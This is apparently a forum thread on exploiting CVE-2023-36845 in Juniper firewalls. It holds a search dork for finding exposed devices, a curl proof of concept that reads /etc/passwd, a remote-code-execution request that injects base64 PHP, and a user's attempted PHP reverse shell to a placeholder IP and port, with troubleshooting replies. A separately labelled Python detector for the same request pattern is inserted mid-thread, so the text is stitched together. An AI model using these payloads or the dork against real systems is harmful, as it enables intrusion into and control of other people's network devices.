Remote Juniper firewalls vulnerable to CVE-2023-36845

ski

This vulnerability scanner can be used to scan Juniper firewalls to determine if they are vulnerable to CVE-2023-36845.


Dork : title:"Juniper" http.favicon.hash:2141724739


Poc:
curl <TARGET> -F $'auto_prepend_file="/etc/passwd\n"' -F 'PHPRC=/dev/fd/0'
 

Attachments

  • cve-2023-36845-scanner-main.zip
    9.6 KB · Views: 30
You can exploit it like
Code:
curl "http://target/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="

PD8KICAgcGhwaW5mbygpOwo/Pg== is <?phpinfo();?> base64 encoded and just like this you can RCE.

Just saying because I did not find a POC for rce

source : https://vulncheck.com/blog/juniper-cve-2023-36845
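
Added example, not part of the original post or of any project's code: a request-triage check for the request shape described above, flagging the parameter and directive names quoted in this thread when they appear in a query string or request body. The function names, hosts and sample records are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter and directive names taken from the requests quoted in this thread.
WATCHED = ("PHPRC", "auto_prepend_file", "allow_url_include")

# A watched name used as a multipart field (name="..."), as a urlencoded key,
# or at the start of a line in a raw body that is read as php.ini text.
_BODY_KEY = re.compile(
    r'(?:name="?|^|&)\s*(%s)\b' % "|".join(WATCHED), re.I | re.M)


def findings(url, body=""):
    """Return sorted 'location:name' strings for one request; [] means clean."""
    hits = set()
    # parse_qsl percent-decodes keys, so an encoded spelling is still caught.
    for key, _ in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if key.lower() in (w.lower() for w in WATCHED):
            hits.add("query:" + key.lower())
    for m in _BODY_KEY.finditer(body):
        hits.add("body:" + m.group(1).lower())
    return sorted(hits)


def scan(records):
    """records: iterable of (client, url, body). Returns only flagged requests."""
    out = []
    for client, url, body in records:
        f = findings(url, body)
        if f:
            out.append((client, url, f))
    return out


# Constructed sample requests (not real traffic); hosts and payload are placeholders.
SAMPLE = [
    ("198.51.100.7", "http://fw.example.test/?PHPRC=/dev/fd/0",
     'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PLACEHOLDER"'),
    ("198.51.100.7", "http://fw.example.test/",
     '--b\r\nContent-Disposition: form-data; name="PHPRC"\r\n\r\n/dev/fd/0\r\n--b--'),
    ("203.0.113.9", "http://fw.example.test/?%50HPRC=x", ""),
    ("192.0.2.10", "http://fw.example.test/index.php?page=login", "user=admin&lang=en"),
]

if __name__ == "__main__":
    for client, url, f in scan(SAMPLE):
        print(client, url, ", ".join(f))
```

The body check needs request bodies to be captured (reverse proxy, WAF or packet capture); a plain access log only supports the query-string check.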
 
thanks dude for letting me know. I also found this on Social Media 😄, the poc part
 
Have you had any experience using rce?
I tried replacing <?phpinfo();?> with php -r '$sock=fsockopen("IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");' but reverse shell doesn't work
 
I did not try this specific one. Maybe try to dig into the article -> https://vulncheck.com/blog/juniper-cve-2023-36845
Maybe some targets implemented some kind of WAF preventing some payloads from being delivered, I don't know.
 